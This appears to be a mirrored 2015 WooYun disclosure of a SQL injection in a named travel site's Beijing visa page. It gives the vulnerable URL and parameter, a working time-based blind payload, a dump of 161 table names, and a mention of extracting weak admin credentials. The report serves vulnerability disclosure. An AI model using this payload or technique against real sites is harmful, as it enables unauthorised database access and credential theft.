乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-24: 厂商已经主动忽略漏洞,细节向公众公开
test
芒果网北京分站存在sql注入漏洞,可获取到管理员信息。
链接:http://bj.mangocity.com/visa/tour_show.jsp?jspmaker_act_id=1027303
Parameter: jspmaker_act_id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: jspmaker_act_id=1027303 AND (SELECT * FROM (SELECT(SLEEP(5)))inWm)
通过注入可获取到dbs信息
当前库是ut7
该库中有161个表
[161 tables]+---------------------------+| account_info || call_post_set || comments || comments_reply || crm_info || dev_data_fields || dev_data_table || dev_input_field || dev_page_input || dev_template || fm_parameter || fm_parameter_set || fm_receivables_payables || g_accessory || g_fm_accounting || g_fm_advertisement || g_fm_inspect || g_fm_person_brokerage || g_sign_state || gather_document || gl_season_destination || gl_strategy || gl_strategy_page_block || hc_train_info || high_custom || hk_airlines_info || hk_flight_info || hk_models || hotel_basic_info || hotel_photo || hotel_price_info || hotel_room_info || income_expenses_single || insurance_company || insurance_info || jd_facility || jd_group_info || jd_hotel_info || jd_photo || jd_room_info || l_photo || member_log || mobile_web_page_block || monthly_balance || oa_appliance || oa_leave || oa_notice || oa_purchase || oa_purchase_log || oa_report_annul || oa_report_annul_log || oa_supplier || oa_userget || old_order || online_ask || optional_order || order_basic_info || order_checkseat || order_doc || order_file || order_finance_statistics || order_gathering || order_insurance || order_invoice || order_other_cost || order_outteam || order_pay || order_pay_log || order_pledge || order_reality_data || order_refund || order_remark || order_supplier || order_visit || order_visit_log || os_accessory_file || os_city || os_company || os_country || os_data_source || os_fileup || os_function || os_g_destination || os_g_trip_type || os_help || os_log || os_login_user || os_module || os_order || os_photo || os_province || os_suggest || os_system || pay_order || personal_quick || phone_to_callcenter || qc_car_info || qc_group_info || reg_member || reg_tables || remit_info || reply_question || scenic_info || scenic_photo || self_expense || set_of_book || sign_contract || sms_date || sms_log || sms_port || sort_table || strategy_article || strategy_aspect_info || strategy_destination_info || strategy_photo || strategy_web_column || system_seting || system_variable || t_ad || t_admin || t_article || t_base_trans || t_category || t_commen || t_gather || t_gatherhis || t_keywords || t_label || t_role || t_source || t_special || t_template || t_vote || t_voteitem || t_web_seting || tour_aspect || tour_basic_info || tour_basic_info_order || tour_destination || tour_price_info || tour_price_info_order || tour_schedule_info || tour_shoping || tour_stard_info || tour_time || trip_type || user_department || user_msg || visa_basic_info || visa_reservation || visa_test || visitor_list || web_article || web_column || web_custom || web_email_subscriptions || web_error_page || web_friendly_link || web_page_block || web_set_tour_aspect || web_set_tour_destination |+---------------------------+
跑了一下t_admin的数据做验证,管理员密码还是弱口令。。。
做好过滤
危害等级:无影响厂商忽略
忽略时间:2015-08-24 10:02
漏洞Rank:15 (WooYun评价)
暂无
